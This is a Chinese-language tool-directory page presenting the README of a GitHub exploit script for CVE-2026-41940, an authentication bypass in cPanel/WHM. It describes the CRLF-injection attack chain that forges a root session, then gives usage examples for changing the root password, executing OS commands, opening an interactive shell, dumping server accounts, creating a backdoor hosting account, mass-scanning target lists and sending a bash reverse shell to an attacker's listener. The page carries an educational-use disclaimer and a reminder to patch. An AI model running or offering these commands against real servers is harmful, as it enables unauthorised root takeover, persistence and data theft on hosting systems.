Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-41940 — cPanel/WHM 身份验证绕过(零日漏洞) | Kitploit
工具/GitHubGitHub/christian93111/cve-2026-41940
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制身份验证学习与教育红队Payload 开发
GitHubchristian93111/cve-2026-41940

CVE-2026-41940

cPanel/WHM 身份验证绕过(零日漏洞)

10294个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

CVE-2026-41940:cPanel/WHM 认证绕过(单目标与多目标)

免责声明: 本文档及关联脚本 (exploit.py) 仅供教育目的、安全研究和授权的渗透测试使用。请勿将此软件用于您不拥有或未经明确许可测试的系统。

概述

exploit.py 是一个演示 cPanel & WHM 中认证绕过漏洞(CVE-2026-41940)的脚本。该漏洞允许未经认证的攻击者通过 CRLF 注入漏洞将 root 会话注入守护进程缓存,最终无需有效凭据即可获得 root 级别的 WHM 访问权限。

漏洞分析与利用流程

该漏洞利用基本认证处理机制中的 CRLF(回车换行)注入漏洞,结合会话传播缺陷。脚本自动化了四个阶段的攻击:

  1. 预认证会话铸造: 连接到公开登录端点(例如 /login/ 或 /cgi/login.cgi)获取基线未认证会话 Cookie (whostmgrsession)。
  2. CRLF 注入: 发送精心构造的包含 Base64 编码有效载荷的基本认证头部,直接将 root 会话字段注入 cpsrvd 会话缓存。服务器的重定向响应泄露了生成的安全令牌 (cpsess)。
  3. 会话传播: 将原始会话 Cookie 发送到经过认证的 WHM 端点,触发 do_token_denied 将伪造的会话传播到守护进程缓存——使其成为有效的经过认证的会话。
  4. 验证: 使用伪造的会话访问受限的 WHM API 端点(例如 /json-api/version)以确认 root 级别访问权限。

先决条件

  • Python 3.x
  • requests 库
pip install requests

用法

python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

参数

目标选择

参数描述
--target URL单个 WHM URL(例如 https://target:2087)
--target-file FILE包含目标的文件(每行一个 ip:port)——自动启用检查模式

网络与核心选项

参数描述
--threads N多目标模式下的并发线程数(默认:10)
--hostname HOST覆盖 Host 头部——当自动发现失败或给出错误主机名时使用
--timeout N每个请求的超时时间(秒)(默认:15)
--retries N网络错误重试次数(默认:3)
--cookie-name NAME强制指定会话 Cookie 名称(如果省略则自动检测)
--no-verify跳过阶段 4 验证并继续执行

利用选项(绕过后)

参数描述
--check仅检查模式——验证漏洞而不进行利用(使用 --target-file 时自动设置)
--password PASS将 root 密码更改为 PASS
--api FUNC调用特定的 WHM JSON-API 函数
--api-params K=V,...--api 的逗号分隔参数
--exec CMD通过 WHM scripts/run_script 执行操作系统命令(备用:rawexec)
--session生成一个 root 一键登录 URL——立即打开,令牌过期很快
--shell进入交互式 WHM shell(仅限单目标)
--dump转储服务器信息:版本、账户、DNS 区域、权限
--add-user USER PASS DOMAIN创建一个新的 cPanel 托管账户
--revshell LHOST LPORT向您的监听器发送一个 bash 反向 shell

输出选项

参数描述
--output FILE将会话令牌和详细信息保存到 JSON 文件

示例

# 检查目标是否易受攻击
python exploit.py --target https://target:2087 --check

# 转储服务器信息(版本、账户、权限)
python exploit.py --target https://target:2087 --dump

# 生成一个一键 root 登录 URL(立即粘贴到浏览器)
python exploit.py --target https://target:2087 --session

# 执行命令
python exploit.py --target https://target:2087 --exec "id"

# 进入交互式 WHM shell
python exploit.py --target https://target:2087 --shell

# 更改 root 密码
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# 直接调用 WHM API
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# 创建一个后门 cPanel 账户
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# 发送反向 shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# 覆盖主机名(当自动发现失败时使用)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# 扫描多个目标(仅检查模式)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# 将会话保存到文件
python exploit.py --target https://target:2087 --dump --output results.json

交互式 Shell 命令

使用 --shell 时,可使用以下命令:

命令描述
api <function> [k=v ...]调用 WHM JSON-API 函数(例如 api version)
exec <command>通过 WHM 运行操作系统命令(例如 exec id)
passwd <newpass>更改 root 密码
dump转储服务器信息
revshell <lhost> <lport>发送反向 shell
add <user> <pass> <domain>创建一个 cPanel 账户
save <path>将当前会话保存到文件
exit / quit退出 shell

提醒

请立即更新最新的 cPanel/WHM 安全补丁。

下载工具